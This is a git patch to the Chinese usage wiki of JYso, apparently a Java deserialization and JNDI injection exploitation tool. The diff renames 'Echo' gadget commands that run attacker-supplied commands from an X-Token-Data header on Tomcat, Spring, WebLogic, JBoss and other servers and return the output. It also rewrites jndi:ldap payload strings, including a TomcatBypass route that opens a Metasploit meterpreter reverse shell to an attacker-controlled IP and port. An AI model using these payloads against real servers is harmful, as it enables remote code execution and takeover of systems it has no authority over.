From 19daf10653b9af08f606a713bd57db37da629f72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:39:22 +0800 Subject: [PATCH] =?UTF-8?q?Updated=20JYso=E2=80=90CN=20(markdown)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JYso‐CN.md | 33 +++++++++++++++++++-------------- 1 file changed, 19 insertions(+), 14 deletions(-) diff --git a/JYso‐CN.md b/JYso‐CN.md index 9914689..f6bd902 100644 --- a/JYso‐CN.md +++ b/JYso‐CN.md @@ -144,26 +144,31 @@ ldap://127.0.0.1:1389/[Basic or TomcatBypass]/command/Base64/[base64_encoded_cmd ## 1.2 Echo使用 -- 命令 `EX-AllEcho`:DFS 找 Request 命令执行回显 -- 命令 `EX-TomcatEcho`:Tomcat 命令执行回显 -- 命令 `EX-SpringEcho`:Spring 命令执行回显 -- 命令 `EX-JbossEcho`:Jboss 命令执行回显 -- 命令 `EX-jettyEcho`:Jetty 命令执行回显 -- 命令 `EX-LinuxEcho1`:Linux 命令执行回显 -- 命令 `EX-LinuxEcho2`:Linux 命令执行回显 -- 命令 `EX-resinEcho`:Resin 命令执行回显 -- 命令 `EX-weblogicEcho`:Weblogic 命令执行回显 -- 命令 `EX-WindowsEcho`:Windows 命令执行回显 -- 命令 `EX-ResinEcho`:Resin 命令执行回显 -- 命令 `EX-WebsphereEcho`:websphere 命令执行回显 +- 命令 `AllEcho`:DFS 找 Request 命令执行回显 +- 命令 `TomcatEcho`:Tomcat 命令执行回显 +- 命令 `SpringEcho`:Spring 命令执行回显 +- 命令 `JbossEcho`:Jboss 命令执行回显 +- 命令 `jettyEcho`:Jetty 命令执行回显 +- 命令 `LinuxEcho1`:Linux 命令执行回显 +- 命令 `LinuxEcho2`:Linux 命令执行回显 +- 命令 `resinEcho`:Resin 命令执行回显 +- 命令 `weblogicEcho`:Weblogic 命令执行回显 +- 命令 `WindowsEcho`:Windows 命令执行回显 +- 命令 `ResinEcho`:Resin 命令执行回显 +- 命令 `WebsphereEcho`:websphere 命令执行回显 对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。 使用时在 Header 中加入 `X-Token-Data` ,其值为待执行的命令,命令执行结果将回显在 response 中。 + JNDI-Injection-Exploit 用法: ++ 不需要参数时 ``` -jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass] +jndi:ldap://127.0.0.1:1389/TomcatBypass/E-TomcatEcho +``` ++ 需要参数时 +``` +jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/-ch Cookiess ``` + ysoserial @@ -178,7 +183,7 @@ jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass] - 支持tomcatBypass路由直接上线msf: - 使用msf的java/meterpreter/reverse_tcp开启监听 ``` -ldap://127.0.0.1:1389/[Basic or TomcatBypass]/E-Meterpreter/msf/[msf_ip]/[msf_port] +ldap://127.0.0.1:1389/TomcatBypass/E-Meterpreter/msf/[msf_ip]/[msf_port] ``` ---